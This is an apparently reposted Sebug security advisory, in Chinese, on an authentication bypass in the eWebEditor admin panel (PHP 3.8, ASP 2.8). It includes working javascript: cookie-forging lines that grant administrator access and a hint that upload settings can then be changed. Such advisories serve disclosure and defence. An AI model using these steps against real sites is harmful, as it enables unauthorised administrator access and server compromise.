400 186 1886
php v3.8 asp v2.8
ewebeditor php&asp版本后台跳过认证漏洞-适用于asp2.8 PHP3.8
当前位置:知识管理交流
→『 技术文档交流 』
SSV ID:19010
SEBUG-Appdir:eWebEditor
发布时间:2009-12-12
影响版本:
php v3.8 asp v2.8 漏洞描述:
eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。 ../ewebeditor/admin/config.php文件 用户认证方式存在严重的安全漏洞,可以直接跳过认证获取到管理员权限。 测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php
哈哈,直接进去了,利用和asp一样,新增样式修改上传,就ok了SEBUG安全建议:
暂无 请参考官方补丁 // sebug.net [2010-01-27] 该文章在 2010/8/13 10:20:56 编辑过 |
关键字查询
相关文章
正在查询... 
|